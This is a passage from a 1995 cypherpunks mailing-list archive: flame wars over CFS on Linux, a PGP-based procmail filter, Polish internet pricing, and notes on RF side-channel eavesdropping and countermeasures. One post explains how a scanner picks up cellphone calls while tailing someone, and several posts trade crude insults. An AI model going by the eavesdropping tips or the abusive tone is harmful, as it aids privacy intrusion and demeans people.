physician on the old "Addams Family" TV show. Compare {Bloggs Family, the}, see also {fred}. It all starts to make sense now..... Long Live Procmail! Mail filtering is cool...... =====================PGP Encrypted Mail Preferred======================== PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. As soon as any man says of the affairs of the state " What does it matter to me? " the state may be given up for lost. J.J.Rousseau - The Social Contract =========================No Unsolicited Email============================ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: The Gray-haired Woman's Complaint My back aches, my pussy is sore; I simply can't fuck any more; I'm covered with sweat, And T�u have iQCVAgUBMNxWfrbmxeO+s+1xAQGTzAP/VA7pG3vFTwx+OTS1tNLdua6rgieSPyez eXdVUbVaVqdxCuRwFlpxDbZjKeclx9D3TZyPnnUF/ZDQf/Tb89+d8iLRz3SROVTZ a0RK5tOFB1/E/d4lWK+rtd4q6fB2se1/NGUE5dC7l97njyQfgBJNE8KdZc9lcLNP C3f9b9fgZGM= =zRqP -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Sat Dec 23 12:27:54 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 24 Dec 1995 04:27:54 +0800 Subject: CFS and Linux In-Reply-To: <199512231615.LAA06929@jekyll.piermont.com> Message-ID: "Perry E. Metzger" writes: > Alice B. Cohen writes: > anonymous-remailer at shell.portal.com writes: > > > 1: please make it install 'out-of-the-box' on Linux. I have the impression that the vast majority of free Unix stuff, even systems-related, runs well under Linux. Some program have problems with flavors of Unix. E.g., I remember how much trouble it was to get pcomm to run under SunOS. I see nothing at all "obnoxious" about this polite request to fix CFS. I see tons of polite requests to fix free stuff on Usenet. > > AT&T's refusal to support CFS and other so-called "secure" software > > under Linux is typical and to be expected. > > God, you are an obnoxious prick. > > First of all, this is Matt Blaze's pet project, not a product of > AT&T. It is given away for free and you should be happy to get it at > all -- no one is obligated to give you a gift. Have you mailed him a > Linux machine to do his testing on? Why do you assume he even has one? > As it happens, he doesn't, and probably doesn't want to go through the > hassle of paying for a computer and putting Linux on it. Perry, one doesn't need to mail someone a Linux machine, or pay for a new computer. One can install it easily in a partition on a non-dedicated PC running Windows, and boot it and MS DOS alternatively. I got the latest Linux CD from $12 from Morse Communications. Or, one can download Linux. Most people have an Intel box somewhere. Linux is free, and comes with source code. Everyone I know who writes code serously has at least tried Linux. No everyone uses it for serious work, but everyone at least played with it. Not having even tried suggests (to me) a regrettable lack of intellectual curiosity. After using both Linux and SCO Unix Extensively on Intel boxes, I can attest that Linux is much less buggy and better supported (via Usenet) than SCO. (*Unix is no longer a trademark of AT&T Bell Labs) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From proff at suburbia.net Sat Dec 23 12:29:29 1995 From: proff at suburbia.net (Julian Assange) Date: Sun, 24 Dec 1995 04:29:29 +0800 Subject: CFS and Linux (fwd) In-Reply-To: <199512231640.LAA07020@jekyll.piermont.com> Message-ID: <199512231941.GAA00983@suburbia.net> > > > Jim Choate writes: > > > > > First of all, this is Matt Blaze's pet project, not a product of > > > AT&T. It is given away for free and you should be happy to get it at > > > all -- no one is obligated to give you a gift. Have you mailed him a > > > Linux machine to do his testing on? Why do you assume he even has one? > > > As it happens, he doesn't, and probably doesn't want to go through the > > > hassle of paying for a computer and putting Linux on it. > > > > > > Be happy he's given you anything at all. > > > > If you are going to do it, do it right the first time. > > > > Second, I really doubt Blaze has a problem obtaining access to computing > > power and a $25 CD should be within his budget. I am annoyed. Matt Blaze has no obligation to produce CFS for free, let alone a version for dummies. And boy, are you a dummy. As someone who has hacked away at CFS for a long time now on several platforms, including linux, I can state that the issues of porting CFS to linux were trivial and involved a one line sed on the rpcgen output. The more recent versions of linux don't even require this. Further, Matt is hardly the government/corporate lacky that you suggest him to be. Why don't you read some of his papers before you show your technical and social ignorance? Get a life. -- +----------------------------------+-----------------------------------------+ |Julian Assange | "if you think the United States has | |FAX: +61-3-9819-9066 | has stood still, who built the largest | |EMAIL: proff at suburbia.net | shopping centre in the world?" - Nixon | +----------------------------------+-----------------------------------------+ From scs at lokkur.dexter.mi.us Sat Dec 23 12:45:20 1995 From: scs at lokkur.dexter.mi.us (Steve Simmons) Date: Sun, 24 Dec 1995 04:45:20 +0800 Subject: Fred Cohen: Re: CFS and Linux In-Reply-To: <199512231904.LAA00483@slack.lne.com> Message-ID: <4bhndf$avo@lokkur.dexter.mi.us> Eric Murray writes: >I'm sure a number of people, myself included, would be willing >to host the CP list should "Dr" Fred make good his threat. And a number of people would no doubt start boycotting Dr. Freds company loudly and publicly should he attack an innocent third party such as toad.com. Fred and Perry are two peas in pod, but as long as they keep their disputes strictly between them I could care less. -- "Home pages are the pet rock of the 90s. We all have them, we all think they're very cute. But in a few years we're going to look back and be pretty embarrassed." -- Tony Shepps From mab at crypto.com Sat Dec 23 12:45:49 1995 From: mab at crypto.com (Matt Blaze) Date: Sun, 24 Dec 1995 04:45:49 +0800 Subject: CFS and Linux (fwd) In-Reply-To: <199512231633.KAA04297@einstein> Message-ID: <199512232014.PAA23147@crypto.com> > If you are going to do it, do it right the first time. > > Second, I really doubt Blaze has a problem obtaining access to computing > power and a $25 CD should be within his budget. > What, exactly, is your complaint? I'm honestly confused. Please see my previous message on this subject for an explanation of the situation regarding CFS with respect to Linux. I'm not "refusing to support" anything. I want to do whatever it takes to get CFS (and other applications of strong cryptography) as widely deployed as possible. I am unwilling to allow supporting CFS to become a full-time job, however, and I'm not going to apologize for that. I have a Linux machine, in fact. But I've tried to run CFS on it and it seems to work fine. I've not investigated further because that seems like a poor use of my time given the large number of Linux experts (who know far more than I ever will about the vagaries of the various Linux releases) who have not come up with a satisfactory, general patch that runs on all the various Linux platforms. The problem seems to be that some versions of Linux include an rpcgen that produces non-standard output. I don't have one of those versions, however, so I've not encountered this "problem" myself. Again, if you want to see CFS, or any other software that I distribute, run on some platform that I don't have, you are welcome to send me patches that I will happily wrap into the distribution (as long as it doesnt break the other supported platforms). Until you do that, you have nothing to whine about. -matt From steve at miranova.com Sat Dec 23 13:05:38 1995 From: steve at miranova.com (Steven L. Baur) Date: Sun, 24 Dec 1995 05:05:38 +0800 Subject: [NOISE] Alta Vista caches queries In-Reply-To: <199512220220.DAA27203@utopia.hacktic.nl> Message-ID: >>>>> "Hieronymous" == Anonymous writes: Hieronymous> Here's one more Hieronymous> reason to worry about the implications of web search Hieronymous> engines: I just stopped in on Digital's new Alta Hieronymous> Vista page, and was surprised to find that the query Hieronymous> field was filled in--with a search I ran 3 or 4 days Hieronymous> ago. I see no evidence whatsoever that caching is taking place. The Alta Vista robot browsed the web site I manage for months prior to public release, and behaved in exemplary fashion. In short, they appear to be managed by people who know what they're doing. There's nothing sinister about Alta Vista IMHO. Furthermore, no one has mentioned the positive changes made to Dejanews since it got bashed thoroughly on this list a few weeks ago. They've significantly turned down the amount of old information indexed, and have restricted the groups (and mailing lists) they archive. -- steve at miranova.com baur From weld at l0pht.com Sat Dec 23 13:30:55 1995 From: weld at l0pht.com (Weld Pond) Date: Sun, 24 Dec 1995 05:30:55 +0800 Subject: 900mhz digital phones Message-ID: <199512232055.PAA01594@l0pht.com> floyddb at alpha.c2.org: > There is a company called Optoelectronics that markets a > radio reciever > called the Interceptor. This is a broad band (several > hundred MHz) device designed to lock on to the most > powerful signal around, regardless of frequency. As > supplied, it only has a rubber duck antenna, but a > broadband, directional antenna (Log Periodic?) could be > attached. There are AM and FM versions that output audio > and a version called the Scout that controls a scanner. > These could have outboard devices hung on to them to decode > digital signals, record the conversation ... all for less > than $1000 I don't think that the Interceptor is going to be much use with spread spectrum reception. Unless you are really, really close to your target other non-ss signals are going to be much stronger. The freq range of the device is 30MHz-2GHz. It is also legal to sell even though it is great at picking up the cellular phone conversations in the car you are tailing. There is also the plausible deniability in a device like this because you don't know what frequency you are listening to so you don't know if it is one of those "illegal ones". A directional antenna isn't much use with a device like this because it will pick up many other stronger signals that will overwhelm your target transmission. I am speaking of suburban or urban areas here. This may work if you are in a rural region where there are no cell towers, braodcast towers, or repeaters in use. The Scout is a just frequency counter so you must have a scanner or the Interceptor to actually listen in. - Weld Pond - From warlord at MIT.EDU Sat Dec 23 14:14:49 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 24 Dec 1995 06:14:49 +0800 Subject: CFS and Linux In-Reply-To: Message-ID: <199512232154.QAA05863@toxicwaste.media.mit.edu> Just to pick nits... > Everyone I know who writes code serously has at least tried > Linux. No everyone uses it for serious work, but everyone at least > played with it. Not having even tried suggests (to me) a regrettable > lack of intellectual curiosity. I do serious development work under Linux. For example, I've been doing development of PGP 3 on an IBM Thinkpad running Linux. So, I can honestly say that I use Linux for serious work... -derek From nobody at REPLAY.COM Sat Dec 23 14:39:57 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 24 Dec 1995 06:39:57 +0800 Subject: Polish telco policy change Message-ID: <199512232221.XAA26875@utopia.hacktic.nl> Pardons requested from those who rightly try to keep Cypherpunks focused. If any of you can think of ways to get this message out and about, you'd be doing a Good Thing: without bandwidth, privacy means a lot less. >------- Forwarded Message------- >Date: Tue, 19 Dec 1995 15:55:49 +0100 (MET) >From: Marta Dubrzynska >To: Marjan Kokot >Subject: Polish internet > >Dear Netpersonality, > >This is a request for help on behalf of the Polish internet. We >have one single internet provider in Poland: NASK. NASK has >bacause of an agreement with the Polish Telecom a >monopoly on lines connecting Poland with the rest of the world. >University's schools and commercial internet providers have to >get their acces from NASK. >Prizes of internet are high. A complete account with SLIP etc. >costs around 60 $ a month. Telephone costs are 3.7 $ per hour. If you >take into account that wages of around 350 $ per month are >considdered normal it is clear why internet is not used by so many people >in Poland. >And now NASK announced that too many people are using the >internet and that they need more money to keep the lines open. >They decided that from January they would raise the prizes, >and that they would calculate costs per bytes sent or recieved. >Yes that's right, we have to pay for letters you send us and we >have to pay for WWW pages you download from us. This will mean >the end of most internet activity in Poland. >If you want to know the details you can find them at: >http://galaxy.uci.agh.edu.pl/~szymon/protest-eng.html >http://www.put.poznan.pl/hypertext/isoc-pl/battle.html >protest at uci.agh.edu.pl > >That's why we Marta Dubrzynska, Webmaster of the Centre for >Contemporary Art in Warsaw, (http://sunsite.icm.edu.pl/culture/csw/) and >Michiel van der Haagen, Net user (http://www.atm.com.pl/COM/michiel/) ask >your help. >Can you make it clear to our Government and NASK that this policy is >disasterous for Polish culture, economy and education? Please check out >these WWW adresses and react. From abostick at netcom.com Sat Dec 23 15:44:11 1995 From: abostick at netcom.com (Alan Bostick) Date: Sun, 24 Dec 1995 07:44:11 +0800 Subject: PGP timeline FAQ... comments requested In-Reply-To: <297.9512221337@exe.dcs.exeter.ac.uk> Message-ID: <2QF3w8m9LgHf085yn@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Not to belittle something that is the obvious result of painstaking work; but I think the timeline FAQ can be improved in two general ways: (1) More of the specific events should be specifically dated; and (2) I think it would be appropriate to include a version history of PGP. Among other things, I think it appropriate to note the distinction between PRZ's own Bass-o-matic conventional encryption in the earliest versions and the use of IDEA in later versions. These comments aside, you've done an excellent job, and the facts you present jibe well with my own understanding. - -- Alan Bostick | SWINDON: What will history say? Seeking opportunity to | BURGOYNE: History, sir, will tell lies as usual. develop multimedia content. | George Bernard Shaw, THE DEVIL'S DISCIPLE Finger abostick at netcom.com for more info and PGP public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMNxVXeVevBgtmhnpAQHJ1QMAmkcQCxoXN5RW4TaviA6yN8BG4aKF2kHh 98/+2WJDrht15SBNna7M1cclT3k0nb4bY2gTIQpCi080vw6tZVhYMRs+lvBjgbLm 7lGyDvdAzAr6azliI6DKwrL7n8aflRiB =dPNR -----END PGP SIGNATURE----- From sameer at c2.org Sat Dec 23 16:29:40 1995 From: sameer at c2.org (sameer) Date: Sun, 24 Dec 1995 08:29:40 +0800 Subject: apache/ssl now commercially available Message-ID: <199512232359.PAA19453@infinity.c2.org> I've finally gotten the licensing taken care of. Whee! http://www.c2.org/apachessl/ -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From adam at homeport.org Sun Dec 24 09:14:09 1995 From: adam at homeport.org (Adam Shostack) Date: Sun, 24 Dec 95 09:14:09 PST Subject: CFS and Linux In-Reply-To: <199512241606.IAA04460@slack.lne.com> Message-ID: <199512241717.MAA29337@homeport.org> Eric Murray wrote: | Where we're headed is mail filters with PGP imbedded (PGP 3 will | make this much easier) that check incoming mail for a valid signature | for certain PGP keyid/fingerprints and pass that mail along. | Other mail that doesn't match gets tossed into a 'junk' folder | or thrown away if you really don't want to talk to anyone that you | don't already know. I agree with the assesment of where we may be going, but the technology is available now. (Marshall Rose uses it; if you want to get mail into his private mailbox, offer him some $ via imbedded FV authorizations in the mail, and it goes into his inbox. If he thinks it was worth his time, he doesn't charge you.) Anyway, the code is defeintely available now. The back end is a little kludgy, but it was needed for an auto ley retreival script. This could easily be hacked to include a +pubring=$people line. The script gives you a keyid, which you can then use to filter on, ie: :0BW * -----BEGIN PGP KEYID=|sender_unknown # the sender unknown script is below :0: ? [ $KEYID = (`cat .buddies`) ] | /var/spool/mail/adam :0e: junk #!/bin/sh # unknown returns a keyid, exits 1 if the key is known # $output is to get the exit status. Othierwise, this would be a one liner. OUTPUT=`pgp -f +VERBOSE=0 +batchmode -o /dev/null` echo $OUTPUT | egrep -s 'not found in file' EV=$? if [ $EV -eq 0 ]; then echo $OUTPUT | awk '{print $6}' fi exit $EV -- "It is seldom that liberty of any kind is lost all at once." -Hume From stewarts at ix.netcom.com Sat Dec 23 19:22:50 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 24 Dec 1995 11:22:50 +0800 Subject: Air Force hacks Navy? Eeeek! Message-ID: <199512240246.SAA10574@ix5.ix.netcom.com> At 01:57 PM 12/22/95 -0500, fc at all.net (Fred Cohen) wrote: >I thought the ET article indicated an exaguration, but if it's true that >there are no Battleships in the US Navy anymore and that the attack was >run using DoD crypto equipment and networks, it's a heck of a lot >different than buying an off-the-shelf Internet package and taking down >the fleet. > >I have no doubt that someone with enough expertise, classified knowledge >and equipment, access, and assistance can get some limited control over >some US Navy ships for some period of time - but I seriously doubt that >a computer whizzkid can take over the fleet from a PC via Email. Depends on how much of a firewall the Navy's got; it may be that the guy really did a dialin to the Pentagon using passwords, or maybe that the ship really does have network connections without adequate security. People _do_ build dialin and other gateways to get around corporate firewalls, in spite of company policy; wouldn't surprise me if the military has the same problem. About 20 years ago, you could dial an FX line in Des Moines which connected to a line at Offutt AFB in Nebraska and autorotored to a radio circuit up to Looking Glass. Looking Glass had a small PBX; you could dial a 2-digit extension to reach somebody on the plane, or dial back down to the ground. At one point, the radio officer on the plane noticed two lights on on the PBX when nobody on the plane was talking on the phone; the rapidly ensuing investigation found a guy in the barracks using a 16-button Autovon phone dialing through the system to call his buddies in Guam. As one might expect, the phone lines coming down from Looking Glass are authorized to call anywhere in the world, at any precedence/preemption level they want to :-) While I don't personally know either the radio officer or the guy who got busted, I do have a friend who was around there when it happened... And similar nonsense is probably still possible today, unless Murphy's left the military. #-- # Thanks; Bill # Bill Stewart, stewarts at ix.netcom.com, Pager/Voicemail 1-408-787-1281 # .... Heading back to The Big Phone Company From stewarts at ix.netcom.com Sat Dec 23 19:22:52 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 24 Dec 1995 11:22:52 +0800 Subject: cyphernomicon FTP site? Message-ID: <199512240247.SAA10588@ix5.ix.netcom.com> At 09:07 AM 12/20/95 -0800, you wrote: >At 12:59 AM 12/20/95 -0800, you wrote: >>At 9:18 PM 12/19/95, Vinod Valloppillil wrote: >>>Anyone know where I can FTP a full copy of the cyphernomicon? >[Much deleted] >>Anybody who plans to download the entire linear file and then print it out >>must be missing a bits in his shift register. > >There are reasons to want a non-html version. The best being uploading to >your favorite text-oriented BBSes. (Or crypto-oriented BBSes.) Not >everyone has access to the web. (Yes, I know it is blasphemy...) It's also nice to be able to read it offline, or feed it to grep, or load copies of it to other sites to reduce congestion on Netcom... #-- # Thanks; Bill # Bill Stewart, stewarts at ix.netcom.com, Pager/Voicemail 1-408-787-1281 # .... Heading back to The Big Phone Company From stewarts at ix.netcom.com Sat Dec 23 21:29:03 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 24 Dec 1995 13:29:03 +0800 Subject: Java and timing info - second attempt Message-ID: <199512240510.VAA03013@ix5.ix.netcom.com> At 10:31 PM 12/18/95 -0800, Jeff Weinstein wrote: > In Netscape Navigator 2.0 Java and JavaScript do not have access >to crypto routines. At some point in the future this will probably >change, but only after we understand the implications much better >than we do today. Doug and/or Amanda Barnes posted some Java crypto stuff a while back, I think using RSAREF; don't know the platform issues. As far as timing goes, Bad Guys can always run accurate timing on their own machines, even if Innocent Victims don't on theirs. However, it may be worthwhile to allow the Java browser users to set the resolution on the clocks available to Java scripts. #-- # Thanks; Bill # Bill Stewart, stewarts at ix.netcom.com, Pager/Voicemail 1-408-787-1281 # .... Heading back to The Big Phone Company From anonymous-remailer at shell.portal.com Sat Dec 23 22:03:32 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 24 Dec 1995 14:03:32 +0800 Subject: CFS and Linux Message-ID: <199512240544.VAA05521@jobe.shell.portal.com> So the master is at last fallen. Kudos to Mr. Jim Choate and Dr. Dimitri Vulis for having the courage of their convictions to help unmask AT&T's deceit in claiming to support Linux and free software when, in truth, it is doing just the opposite. Maybe, just maybe, we can seize this opportunity to advance the cause of justice, if not justice itself (true justice would require AT&T to recognize its obligation to our heros at Berkeley and pay them their USD 25,000). I call upon us all to expose AT&T for what it is! Had your software erased by the CFS install programme? Return their own medicine! Sue them! Tired of Blaze's prattle about how he is a Linux-lover even though he can't be bothered to use Linux? Challenge him! Tired of AT&T and Netscape employees stealing your resources? Configure your servers to deny W3 access to AT&T and Netscape computers! Linux isn't perfect, but its open environment is a good start for building REAL secure software. Don't let AT&T's lies bully you into abandoning it! CFS will never run under Linux until it is plucked from the monster's grasp. We, too, are guilty when we continue to invite the monster not only to walk in our midst unchecked, but to sleep in our homes as an invited, nay, paid, guest. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From jamesd at echeque.com Sat Dec 23 23:01:37 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 24 Dec 1995 15:01:37 +0800 Subject: Fred Cohen: Re: CFS and Linux Message-ID: <199512240623.WAA25488@blob.best.net> At 03:05 PM 12/23/95 -0500, Steve Simmons wrote: > Fred and Perry are two peas in pod, Perry is an asshole. Fred is a stupid ignorant asshole who talks nonsense. Perry often mixes useful, accurate and informative information in between the insults. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Sat Dec 23 23:01:59 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 24 Dec 1995 15:01:59 +0800 Subject: Fred Cohen: Re: CFS and Linux Message-ID: <199512240623.WAA25485@blob.best.net> At 11:04 AM 12/23/95 -0800, Eric Murray wrote: >I'd even be willing to testify in court as to the nature of >Fred's reputation. I'm sure the operator of the Firewalls list >would be too. Fred's reputation is so low he cannot be defamed. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From bdavis at thepoint.net Sat Dec 23 23:14:46 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 24 Dec 1995 15:14:46 +0800 Subject: Fred Cohen: Re: CFS and Linux In-Reply-To: <199512231823.NAA07160@jekyll.piermont.com> Message-ID: On Sat, 23 Dec 1995, Perry E. Metzger wrote: > > Fred Cohen writes to me in private: ... > > Let's see. I guess I would start by having the police confiscate the > toad.com computers becfause thay are part of a criminal conspiracy to ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ I didn't realize that AI research was that far along. Can someone point me to the specs for the computer that can become a "part of a criminal conspiracy"?? EBD > daamage my reputation. Criminal because of the recent changes in the > law that prohibit you from sending me information I don't want to get. > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From bdavis at thepoint.net Sat Dec 23 23:17:15 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 24 Dec 1995 15:17:15 +0800 Subject: Fred Cohen: Re: CFS and Linux In-Reply-To: <199512231845.NAA07203@jekyll.piermont.com> Message-ID: On Sat, 23 Dec 1995, Perry E. Metzger wrote: > > Fred Cohen writes: > > > The dollar value would be $1 plus a public apology plus all costs of the > > > suit plus my time to right the wrong (at my usual fee of course). Of > > > course the fact that you have decided to make this posting in public > > > justifies my extensive efforts to clear my reputation which, unless you > > > apologize immediately will be surprisingly enjoyable for me. > > > > Go and sue, Fred. Its what I have lawyers for. If you can even find an > > attorney willing to take your "case", mine will likely remind yours > > that lawyers can now be punished by the court in many jurisdictions > > for knowingly aiding in bringing frivolous suits. If you are seeking > > $1 in damages the court is especially likely to consider the whole > > thing a waste of time. > > Your choice, but it's not a very nice Christmas present to find yourself > in litigation. I'll give you till Tuesday to reconsider. If I see the > public apology, I won't call the lawyers. > > If I were you, I would talk to those lawyers of yours and get their > opinion of whether it's worth your while to be malicious toward people > in this way in exchange for defending against a law suit when all you > have to do to prevent it is apologize for what you now know to be a > falsehood. How, exactly, does Perry (or anyone else here) "know" it to be a falsehood. Fred denies it. If I was posting anonymously and was accused of being the anonymous poster, I'd deny it too. Oh, I forgot, someone posting as one of the "Alices" denied it too. That makes it conclusive. This anonymity thing is easier than I thought. EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From don at wero.cs.byu.edu Sun Dec 24 00:04:38 1995 From: don at wero.cs.byu.edu (Don M. Kitchen) Date: Sun, 24 Dec 1995 16:04:38 +0800 Subject: CFS and Linux In-Reply-To: <199512240544.VAA05521@jobe.shell.portal.com> Message-ID: <199512240748.AAA13767@wero.cs.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- Sorry for being one of those who responds to Detweiler's troll... > So the master is at last fallen. Kudos to Mr. Jim Choate and Dr. > Dimitri Vulis for having the courage of their convictions to help > unmask AT&T's deceit in claiming to support Linux and free software > when, in truth, it is doing just the opposite. Patting yourself on the back again eh? I didn't know people as stupid as you knew how to use email. CFS is Matt Blaze's toy. A toy. When ATT starts charging money for CFS, then all your bitching and moaning about ATT _might_ make sense. Oh, by the way, since when did att "claim" to support linux? > Linux isn't perfect, but its open environment is a good start for > building REAL secure software. Don't let AT&T's lies bully you > into abandoning it! CFS will never run under Linux until it is Oh brother, now I know for sure that this is a spoof. Nobody could be this lame for reals... Don - -- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://students.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Junk mail to root at 127.0.0.1 * This user insured by the Smith, Wesson, & Zimmermann insurance company * -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMN0F4cLa+QKZS485AQFjFwL+Pk6s59bAATKkSgoH4eGrdcDQ1gwA0Nog Lih8rbkWD7RIf3g2g7xiaPnEI+HQBCWvSHkdeybZ8CPLC/E40ONHeA06+l+J6jDK PpAskeZxu8aUKlyXDl3seIb3Xmguy+Mz =3Kr4 -----END PGP SIGNATURE----- From jimbell at pacifier.com Sun Dec 24 00:58:04 1995 From: jimbell at pacifier.com (jimbell) Date: Sun, 24 Dec 1995 16:58:04 +0800 Subject: Spread-Spectrum computer clock? Message-ID: Recently there has been a substantial amount of discussion concerning the use of accurate timing in an attempt to uncover encryption keys, by carefully noting the length of time that a decryption takes in a computer of a known cpu speed. I have noticed that most of the discussion focussed on the delay time of the overall operation done over a network, for example a LAN or perhaps the Internet, but it has been recognized that imprecision due to indeterminate network timings make such a tactic problematic at least. However, being a ham and occasionally listening to the various odd noises produced by a computer when you tune a VHF or UHF ham radio to a harmonic of the clock speed, it ccurred to me that the delay times WITHIN a particular encryption/decryption would be far more easily measured with local RF snooping. I would imagine that if you can determine even a fraction of a bit of key from a network "ping," you could do a lot better "listening" to the execution of a program within a few hundred feet with an ordinary radio receiver and a sophisiticated analysis program. Okay, I admit, this is certainly not a new idea. The military's TEMPEST program is to build electronic equipment which is so "quiet" that it is impossible (or, at least, arbitrarily difficult) to capture useful information by inadvertent radio transmission. Obviously, that is out of the league (not to mention the budget) of the vast majority of the users of personal computers. Nevertheless, it seems to me that if we as a community of computer users are interested in security, we should not merely focus on the mathematics and algorithms used and their reliability, but also secondary methods to break the systems involved. True, most of us are not sufficiently interesting "targets" to justify this kind of attack, but machines such as encrypted remailers are sufficiently "high value" that protecting them would be worth a little extra effort I'm not under any illusion that we can hope to make them "snoop-proof", but a little effort should substantial raise the difficulty level.. More than a year ago, it occurred to me that it might be worth it to build a CPU clock replacement module that took the place of the main CPU crystal oscillator, and replaced it with a oscillator module whose frequency was (very long period!) pseudorandomly varied, possibly with a resolution of 16-bit and over a range of perhaps 1%., with the frequency varying every few tens or hundreds of microseconds. The result, I presume, is that every operation synchronized to the microprocessor clock would vary in time and would be hard to "tune" with a normal radio receiver. It seems to me that this would make the resulting computer harder to "bug" using standard equipment. If this were do-able and were in fact done, it would probably be worth it to "tailor" the spectrum of variation in clock speed so that these variations do not tend to average out over "long" times, for example a few hundred milliseconds or even tens of seconds. This would at least help to disguise the decryption-time information that is commonly discussed. A complicating factor is the fact that modern motherboards often generate their microprocessor clocks using PLL synthesis from a master clock, probably the 14.318 MHz clock. On the one hand, that might make the process easier; only one clock to vary. On the other, it is at least conceivable that there are some devices in any given computer which depend on a precisely constant clock speed, and would not tolerate such variation. This was probably more true in the early days of the IBM PC; today you usually see separate crystals on any cards that need truly specific frequencies. (Hey, I didn't say this was a perfect solution, merely one that would raise the barrier a bit...) Other potential tactics. (Some of which are already happening; if anybody out there is more informed about such techniques, please tell me) 0. Copper-screen cages. Okay, maybe this appears to be a bit too obvious, but it really isn't too involved: A few years ago, I happened onto a roll of honest-to-goodness copper screen; sort of line window screen but made of pure copper. Sewn/soldered into a bag, it would make an excellent cover. (openings required for floppies and CDROMS, as well as cables are obviously a complication, but... 1. Use CPUs with Internal caches as well as external caches, both to reduce the amount of electronic noise transmitted to antenna-length wires outside the microprocessors, as well as make external memory accesses less predictable and less frequent. Fortunately, I suppose, the natural transition to 486's, DX2's and DX4/4s) and Pentiums has make this happen without any anti-snooping motivaition. 2. Eventually, CRT's will be replaced with some sort of matrix-type displays that emit far less useable information and will be easier to shield. 3. Filtering of every wire that comes out of the computer's case, primarily using a combination of ferrite beads and decoupling capacitors. This would be especially true of the telephone line, which would be accessible from outside a house or office. Also, use of multiple powerline filters/surge protectors in series. 4. I'd pay particular attention to the keyboard interface and its associated microcontroller: Years ago, I speculated that if a VFO (voltage to frequency converter) was placed on the data line between the keyboard and the computer, it would transmit the identity of every key pressed. (This would obviously include passwords, too) (Does the keyboard hardware of the typical PC allow echobacks, whcih would allow the CPU to fill the CPU/Keyboard channel with apparently meaningless random garbage, thwarting RF overhearing of this data?!?) And I wouldn't be surprised if the NSA has built replacement keyboard controllers to be used to surreptiously replace on garden-variety keyboards, controllers which deliberately "broadcast" such information in an even easier-to-discern pattern. Even a short access to such a keyboard and it might be telling your secrets. Even if a black-bag job wasn't possible, If it were possible to tune to its normal keyboard microprocessor operation rate, and given a known keyboard scan pattern a particular pressed key could be identified. Given how cheap keyboards are these days, a slightly paranoid person might buy one from a trustworthy source and glue the case shut to prevent tampering, and replace it monthly with cast-offs. 5. While this isn't my area of expertise, it occurs to me that softrware should be written to complete operations in an identical time frame, no matter the input data. While this has already been hashed over on the nets, the "solution" that is typically discussed involves adding a null loop at the end of the real operation, and contining only after the "wall clock" shows enough time has passed. This isn't an adequate solution, I think, if local RFmonitoring of the computer can be done. (It will know when the actual result ended) A better (and, sadly, more inefficient) method would involve executing BOTH branches of conditional jump, and only using the data generated from the desired half at the very end.. Another possibility might be (for certain large mathematical algorithms) is to split up the functions and to execute them in a "random" order, with enough "dummy" operations inserted to further disguise the facts. For example, if you're multiplying two 1024-bit values to get a 2048-bit result, program this to be done in a pseudrandom order and intersperse any operations with pseudorandom operations to disguise it. (A pseudorandom interrupt generator might help, here.) 6. Think like an NSA hack. If I were such a sneaky bastard, I'd try to figure out a way to module a visible LED on the computer's case with data, or modulate the video display's brightness to signal slow-speed data.. Well, that's just a few thoughts. There's a lot more material out there that ought to be discussed. Admittedly, these subjects can appear to be a bit more than a little paranoid, but without such discussion we're almost certain to be at risk. From attila at primenet.com Sun Dec 24 00:58:08 1995 From: attila at primenet.com (attila) Date: Sun, 24 Dec 1995 16:58:08 +0800 Subject: Fred Cohen: Re: CFS and Linux In-Reply-To: Message-ID: On Sun, 24 Dec 1995, Brian Davis wrote: > On Sat, 23 Dec 1995, Perry E. Metzger wrote: > > > Fred Cohen writes to me in private: > ... > > > > Let's see. I guess I would start by having the police confiscate the > > toad.com computers becfause thay are part of a criminal conspiracy to > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > I didn't realize that AI research was that far along. Can someone point > me to the specs for the computer that can become a "part of a criminal > conspiracy"?? > > EBD > > > > daamage my reputation. Criminal because of the recent changes in the > > law that prohibit you from sending me information I don't want to get. > > > the basis of the seizure is for evidence collection. then they take their sweet time scrounging the disks 